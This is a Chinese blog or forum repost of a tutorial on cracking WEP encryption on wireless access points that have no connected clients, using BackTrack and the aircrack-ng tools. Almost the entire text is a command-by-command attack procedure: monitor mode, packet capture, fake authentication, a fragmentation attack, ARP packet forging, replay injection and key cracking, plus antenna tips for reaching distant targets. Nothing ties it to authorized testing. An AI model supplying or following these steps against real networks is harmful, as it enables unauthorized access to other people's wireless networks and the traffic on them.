2. 技术人生
    3. BT2、BT3下破解无客户端wep

    BT2、BT3下破解无客户端wep

    技术2022-05-12  4

    参考:

    http://www.anywlan.com/bbs/viewthread.php?tid=7444

    http://www.anywlan.com/bbs/viewthread.php?tid=7457

    官方支持的可注入的网卡:

    http://www.wlanbbs.com/thread-8-1-1.html

     

    装备: dell D410笔记本、linksys wusb54g v4 (加装12db 八木定向天线)、bt2 usb 系统 1.先升级Aircrack。因破解环境往往无法在线升级bt2,故先将aircrack-ng-0.9.1.tar.gz 下载到本地硬盘,我是放在c盘的根目录下。用usb bt2 系统启动bt2,进入界面后,打开一个窗口,输入cd /mnt 输入再输入 ls 这样你就能看到你的硬盘名 一般是sda1 hda1 或hdc1(我的就是hda1)再输入cd /mnt/hda1 或者cd /mnt/hdc1, 就是进入你的c盘根目录。再输入tar -xf aircrack-ng-0.9.1.tar.gz再输入cd aircrack-ng-0.9.1再输入make clean && make && make install这样,你就可以直接在新版本下破解了。 2.输入ifconfig –a 查看网卡 (顺便记下自己网卡的mac,后面要用到)我的网卡是rausb0 再输入ifconfig –a rausb0 up 加载usb网卡驱动3.输入airmon-ng start rausb0 6 激活网卡的Monitor模式后面的6 是你要破解ap 的工作频道 根据实际,换成你破解的ap的实际工作频道(下同)。4.输入抓包命令,抓包并查看你要破解的ap的essid 和 mac输入命令 airodump-ng --ivs -w name -c 6 rausb0 ,其中,rausb0是你破解用的网卡接口名(下同),这样,你的窗口将显示一个工作站,可以看到你要破解的ap的essid 和mac ,并记下ap的essid 和mac。5.上面窗口不关闭,另开一个窗口,输入命令,用自己的网卡连接要破解的ap输入 aireplay-ng -1 0 -e ap的essid -a ap的mac -h 自己网卡的mac rausb0这时,系统将回显Sending Authentication RequestAuthentication successfulSending Association RequestAssociation successful :-) 6.输入aireplay-ng -5 -b ap的mac -h 自己网卡的mac rausb0 来获得xor文件如果一切顺利,系统将回显 Use this packet ?输入y 回车再输入ls 查看当前目录,你将看到刚才生成的一个后缀名为xor 的文件。7.输入packetforge-ng -0 -a ap的mac -h 自己网卡的mac -k 255.255.255.255 -l 255.255.255.255 -y fragment -xxxx-xxxxxx.xor -w mrarp 其中,–l中的l是L的小写,别和1混淆,而其中的xxxx-xxxx.xor 是你刚才生成的文件名 系统回显:Wrote packet to: mrarp8.输入aireplay-ng -2 –r mrarp -x 1024 rausb0 ,发包攻击.其中,-x 1024 是限定发包速度,避免网卡死机,我选择的是512。输入y 回车 攻击开始 这时,前面的抓包窗口上的data将迅速增加。到数据增加到3万以上时,另开窗口,启动aircrack-ng -n 64 -b ap的mac name-01.ivs其中 64 是64位密码,如果是128位,换成128即可。我个人感觉,bt2(u盘启动) 对pc卡 、pcm 卡 支持不怎么好——我一块 声宝la4111、一块神脑2511大功率无线网卡都不支持发包攻击,最终的成功来源于linksys wusb54g v4 。使用该卡破解,两点需要注意:一是该卡的天线和发射功率都比较次,对较弱的信号,需要对网卡天线进行改造(具体参考坛子上的改造方式,我用的是12db的八木定向天线),否则无法发包。二是 由于该卡功率有限,在发包攻击时,最好限定发包数量,否则容易发生网卡发热,出现“死卡”现象。 具体是:在破解有客户端时,发包命令 aireplay-ng -3 -b 路由mac -h 客户mac rausb0 在该命令中加入 -x 参数,限定发包速度。 我用的是1024 ,甚至512 。具体的命令为aireplay-ng -3 -b 路由mac -h 客户mac -x 512 rsusb0 而在破解无客户端时,发包命令 aireplay-ng -2 –r arp rausb0 中间同样插入参数 -x 1024 或 -x 512 我选择的是 aireplay-ng -2 –r arp -x 512 rausb0 。本文地址:http://www.anywlan.com/bbs/thread-7457-1-1.html

    专利

    最新回复(0)